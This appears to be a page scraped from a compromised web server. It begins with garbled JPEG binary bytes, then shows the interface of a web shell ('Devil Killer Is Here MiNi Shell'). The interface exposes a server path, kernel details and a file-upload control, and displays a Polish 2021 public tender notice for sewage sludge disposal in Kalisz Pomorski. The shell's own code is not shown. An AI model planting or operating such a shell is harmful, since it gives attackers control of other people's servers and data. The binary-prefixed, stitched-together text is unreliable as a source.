JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20211006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20211006/0021286501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „UTYLIZACJA OSADU POŚCIEKOWEGO <br/>O KODZIE 19 08 05 Z OCZYSZCZALNI ŚCIEKÓW <br/>W KALISZU POMORSKIM PRZY UL. SZCZECIŃSKIEJ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330015813</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolności 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kalisz Pomorski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94 361 62 11</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">94 361 78 78</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pgkim10@vp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pgkim-kalisz-pom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „UTYLIZACJA OSADU POŚCIEKOWEGO <br/>O KODZIE 19 08 05 Z OCZYSZCZALNI ŚCIEKÓW <br/>W KALISZU POMORSKIM PRZY UL. SZCZECIŃSKIEJ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38a38b2f-25d0-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00212865</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający i Wykonawcy przekazują drogą elektroniczną, za pomocą platformy: mini Portal https://miniportal.uzp.gov.pl i ePUAPu https://epuap.gov.pl/wps/portal,<br/>- poczty elektronicznej e-mail: pgkim10@vp.pl;</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. <br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. <br/>5. Identyfikator postępowania i klucz publiczny dla danego postępowania o udzielenie zamówienia dostępne są na Liście wszystkich postępowań na miniPortalu oraz stanowi załącznik do niniejszej SWZ.<br/>6. Dopuszczalna forma przekazywania zawiadomień, oświadczeń, wniosków wyłącznie elektroniczna. <br/>7. W korespondencji kierowanej do Zamawiającego Wykonawca winien posługiwać się numerem postępowania określonym w SWZ.<br/>8. Powyższe oświadczenia, Wykonawcy powinni przesłać lub złożyć w formie wskazanej w SWZ, oraz podpisane przez osobę/osoby upoważnioną/upoważnione do działania w imieniu Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO) Zamawiający informujemy, że<br/>1.	Administratorem danych osobowych jest samorządowy zakład budżetowy Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej z siedzibą przy ul. Wolności 10 , 78-540 Kalisz Pomorski. <br/>2.	Z Administratorem można się kontaktować pisemnie, za pomocą poczty tradycyjnej na adres: ul. Wolności 10, 78-540 Kalisz Pomorski lub email: sekretariat@pgkim-kalisz-pom.pl telefon kontaktowy 0943616211<br/>3.	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pisemnie za pomocą poczty tradycyjnej na adres: ul. Wolności 10, 78-540 Kalisz Pomorski lub email: sekretariat@pgkim-kalisz-pom.pl telefon kontaktowy 0943616211<br/>4.	Pani/Pana dane osobowe są przetwarzane na podstawie art. 6 ust.1 RODO, tj. w oparciu niezbędności przetwarzania do celów wynikających z prawnie uzasadnionych interesów realizowanych przez Administratora samorządowy zakład budżetowy Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej w Kaliszu Pomorskim. <br/>5.	Celem zbierania danych jest:<br/>•	wykonanie umowy, której stroną jest osoba, której dane dotyczą lub podjęcie działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy, a przekazanych drogą mailową, telefonicznie lub bezpośrednio do biura przedsiębiorstwa <br/>•	w realizacja umowy o świadczenie usług: woda, odprowadzenie ścieków, wywóz nieczystości płynnych , umowy najmu lokalu , opłaty komunalne, usługi cmentarne zgodnie z przeznaczeniem, dla których te dane zostały udostępnione,<br/>•	w celach związanych z postępowaniem o udzielenie zamówienia publicznego nr PGKiM.ZP.271.1.2021 pn.: „Wymiana pokrycia dachowego w budynku mieszkalnym wielorodzinnym przy ul. Dworcowej 26 B i D w Kaliszu Pomorskim”<br/>6.	W związku z przetwarzaniem Pani/Pana danych osobowych przysługuje Pani/Panu prawo do:<br/>•	żądania od Administratora dostępu do Pani / Pana danych osobowych,<br/>•	żądania od Administratora sprostowania Pani / Pana danych osobowych,<br/>•	żądania od Administratora usunięcia Pani/Pana danych osobowych,<br/>•	żądania od Administratora ograniczenia przetwarzania Pani / Pana <br/>danych osobowych,<br/>•	wniesienia sprzeciwu wobec przetwarzania Pani / Pana danych osobowych,<br/>•	przenoszenia Pani / Pana danych osobowych,<br/>•	wniesienia skargi do organu nadzorczego – Prezes Urzędu Ochrony Danych Osobowych.<br/>7.	Podanie danych jest dobrowolne, lecz niezbędne w realizacja umowy o świadczenie usług. W przypadku niepodania danych nie będzie możliwa realizacja umowy o świadczenie usług.<br/>8.	Dane udostępnione przez Panią/Pana nie będą podlegały udostępnieniu podmiotom <br/>trzecim. Odbiorcami danych będą tylko instytucje upoważnione z mocy prawa.<br/> 9. Dane udostępnione przez Panią/Pana nie będą podlegały profilowaniu.<br/> 10. Administrator danych nie ma zamiaru przekazywać danych osobowych do państwa <br/> trzeciego lub organizacji międzynarodowej.<br/> 11. Dane osobowe będą przechowywane przez okres nie dłuższy, niż jest to niezbędne <br/> do celów, w których dane te są przetwarzane.<br/> 12. Administrator dokona wszelkich starań, aby zapewnić wszelkie środki fizycznej, <br/> technicznej i organizacyjnej ochrony danych osobowych przed ich przypadkowym <br/> czy umyślnym zniszczeniem , przypadkową utratą , zmianą , nieuprawnionym <br/> ujawnieniem , wykorzystaniem czy dostępem , zgodnie ze wszystkimi obowiązującymi <br/> przepisami. <br/><br/>Powyższa Klauzula Informacyjna dostępna jest także na tablicy ogłoszeń w siedzibie Przedsiębiorstwa przy ul. Wolności 10, 78540 Kalisz Pomorski , oraz na stronie internetowej pgkim-kalisz-pom.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PGKiM.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Utylizacja osadu pościekowego polegać będzie na:<br/>- podstawieniu środków transportu,<br/>- transporcie komunalnych osadów ściekowych z oczyszczalni ścieków w Kaliszu Pomorskim do miejsca odzysku lub unieszkodliwienia,<br/>- przeprowadzenie zadeklarowanej operacji zagospodarowania osadu.<br/>Szacunkowa ilość odwodnionego osadu ściekowego do odbioru, wywozu i zagospodarowania w czasie obowiązywania umowy wynosi 700 ton osadu. Kod odpadu 19 08 05, podstawa prawna: katalog odpadów – załącznik do rozporządzenia Ministra Środowiska z dnia 03 stycznia 2020r. w sprawie katalogu odpadów (Dz. U. z 2020 poz. 10). Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 - Część techniczna oraz załącznik nr 4 - Charakterystyka osadu. <br/>Osad pochodzący z oczyszczalni ścieków w Kaliszu Pomorskim jest ustabilizowanym komunalnym osadem odwodnionym, powstającym w procesie oczyszczania ścieków, dlatego też podstawową charakterystykę odpadu sporządza się bez przeprowadzenia badań i testów zgodności.<br/><br/>2. Wywóz i zagospodarowanie osadu:<br/>Za transport i utylizację osadu ściekowego (zgodnie z Ustawą o odpadach i ustawą Prawo Ochrony Środowiska) odpowiada Wykonawca. Załadunek osadu leży po stronie Zamawiającego. Odbiór i wywóz osadu będzie odbywał się przy użyciu przystosowanego do tego rodzaju ładunku sprzętem nalężącym do Wykonawcy. Wykonawca dostarczy pusty kontener, w którym będą gromadzone a następnie wywożone w celu odzysku osady ściekowe pochodzące z oczyszczalni ścieków w Kaliszu Pomorskim. Pusty kontener powinien być przygotowany do załadunku oraz ustawiony w miejscu wyznaczonym przez Zamawiającego. Kontenery należy wyposażyć w zamknięcia umożliwiające ich transport zgodnie z obowiązującymi przepisami prawa. <br/>Odbiór osadu Wykonawca dokona na każde wezwanie Zamawiającego, w terminie zadeklarowanym w złożonej przez Wykonawcę ofercie. Termin odbioru osadu jest jednym z kryteriów oceny ofert w niniejszym postępowaniu. Zgłoszenia dokonywane będą za pośrednictwem telefonu, e-maila lub faksu. Częstotliwość wywozu od 1 do 1,5 tygodnia. Potwierdzenie przejęcia osadów ściekowych odbywać się będzie każdorazowo na podstawie kwitu wagowego po zważeniu na wadze towarowej oraz karty przekazania odpadów jako potwierdzenia prawidłowego zagospodarowania osadu ściekowego. Karta przekazania odpadów powinna być zgodna z rozporządzeniem Ministra Środowiska z dnia 25 kwietnia 2019r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2019 poz. 819).<br/>Wywóz odpadów powinien odbywać się szczelnymi środkami transportu a w okresie zimowym należy przeciwdziałać przymarzaniu osadu do skrzyni załadowczej. Załadunek osadu następuje bezpośrednio do kontenera za pomocą podajnika ślimakowego. Zamawiający nie dopuszcza załadunku na naczepy samowyładowawcze typu wanna. <br/>Tygodniowa produkcja osadu wynosi 10 ton.<br/>Po stronie Wykonawcy leży podstawienie szczelnych kontenerów o wymiarach 5,50 x 2,20 x 180. Pojemność kontenera powinna wynosić ok. 23 m³. Podane wymiary kontenera pozwalają na jednorazowy wywóz w ilości 10-12 ton osadu, przy średnio jednorazowym tygodniowym opróżnieniu kontenera. Wylot z podajnika ślimakowego – wysokość 2,8 metra nad posadzką.<br/>W zakresie dalszego zagospodarowania osadu Zamawiający pozostawia w gestii zarządzającego składowiskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90513700-3 - Usługi transportu osadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający w oparciu o art. 214 ust. 1 pkt 7 P.z.p., przewiduje możliwość udzielenia Wykonawcy zamówienia polegającego na powtórzeniu podobnych usług, w szczególności:<br/>1)	transportu i utylizacji osadu ściekowego w większej ilości niż przewidziana w Rozdziale IV SWZ,<br/>2)	realizacji przez Wykonawcę innych usług lub obowiązków, niż przewidziane w SWZ, a związanych z przedmiotem zamówienia,<br/>3)	realizacji transportu i utylizacji osadu ściekowego w innym terminie niż wskazany w Rozdziale V SWZ.<br/>2. Zamówienie, o którym mowa w ust. 3, może zostać udzielone:<br/>1)	na analogicznych warunkach jak udzielenie zamówienia podstawowego, z zastrzeżeniem różnic wynikających ze specyfiki przedmiotu zamówienia uzupełniającego. Zamówienie uzupełniające zostanie udzielone po przeprowadzeniu negocjacji, których przedmiotem może być m.in. wysokość wynagrodzenia Wykonawcy, tytułem świadczenia usług,<br/>2)	jednokrotnie lub kilkukrotnie,<br/>3)	do maksymalnej wartości 20% wysokości wynagrodzenia Wykonawcy, pierwotnie wskazanego w §6 ust. 1 umowy (w brzmieniu pierwotnym).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach wskazanych powyżej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin odbioru osadu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy: <br/>1)	nie podlegają wykluczeniu na podstawie przesłanek wskazanych w Rozdziale IX SWZ,<br/>2)	spełniają wszystkie ustanowione w Postępowaniu warunki udziału w postępowaniu dotyczące: <br/><br/>1.1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów.<br/><br/>Zamawiający wymaga, aby Wykonawca spełniał następujące warunki:<br/>a) posiadał zezwolenie na odbiór, wykorzystanie, unieszkodliwienie odpadów o kodzie 19 08 05,<br/>b) posiadał zezwolenie na przetwarzanie i zutylizowanie osadu ściekowego w ilościach nie mniejszych niż objęte przedmiotem zamówienia.<br/><br/>1.2) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa warunków w tym zakresie. <br/><br/>1.3) zdolności technicznej lub zawodowej<br/> Zamawiający nie określa warunków w tym zakresie. <br/><br/><br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w ust. 1 mogą zostać spełnione przez jednego wykonawcę lub łącznie przez kilku lub wszystkich wykonawców wspólnie ubiegających się o zamówienie, z zastrzeżeniem wymogów wynikających z art. 117 ust. 2 i 3 P.z.p. <br/>3.	Wstępne potwierdzenie okoliczności, o których mowa w ust. 1 następuje na podstawie oświadczenia, o którym mowa w art. 125 ust. 1 P.z.p., które Wykonawca zobowiązany jest dołączyć do oferty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	informacja z Krajowego Rejestru Karnego w zakresie:<br/>a)	art. 108 ust. 1 pkt 1 i 2 P.z.p.,<br/>b)	art. 108 ust. 1 pkt 4 P.z.p.,<br/>- sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>2)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 P.z.p., o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tj. Dz.U. z 2021 roku poz. 275), z innym wykonawcą, który złożył odrębną ofertę w Postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w Postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór oświadczenia Wykonawcy o przynależności/braku przynależności do grupy kapitałowej – załącznik nr 6 do SWZ. W przypadku wykonawców wspólnie ubiegających się o zamówienie oświadczenie składa, każdy z wykonawców.<br/>3)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 P.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	dokumenty potwierdzające posiadanie przez Wykonawcę:<br/>a)	aktualnego zezwolenia na prowadzenie działalności w zakresie transportu, odzysku, unieszkodliwienia odpadów zgodnie z wymogami ustawy o odpadach (kod 19 08 05)<br/>b)	aktualnego zezwolenia na przetwarzanie i zutylizowanie osadu ściekowego, w ilościach nie mniejszych niż objęte przedmiotem zamówienia. <br/>Jeżeli Wykonawca ma siedzibą lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast informacji z Krajowego Rejestru Karnego, składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo - w przypadku braku takiego rejestru - inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie, o którym mowa w powyżej w ust. 2 pkt 1).<br/>2.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub - jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą - złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	dokument potwierdzający umocowanie do złożenia oferty, jeżeli umocowanie to nie wynika z odpowiednich rejestrów / ewidencji,<br/>2)	pełnomocnictwo do reprezentowania wykonawców ubiegających się wspólnie o 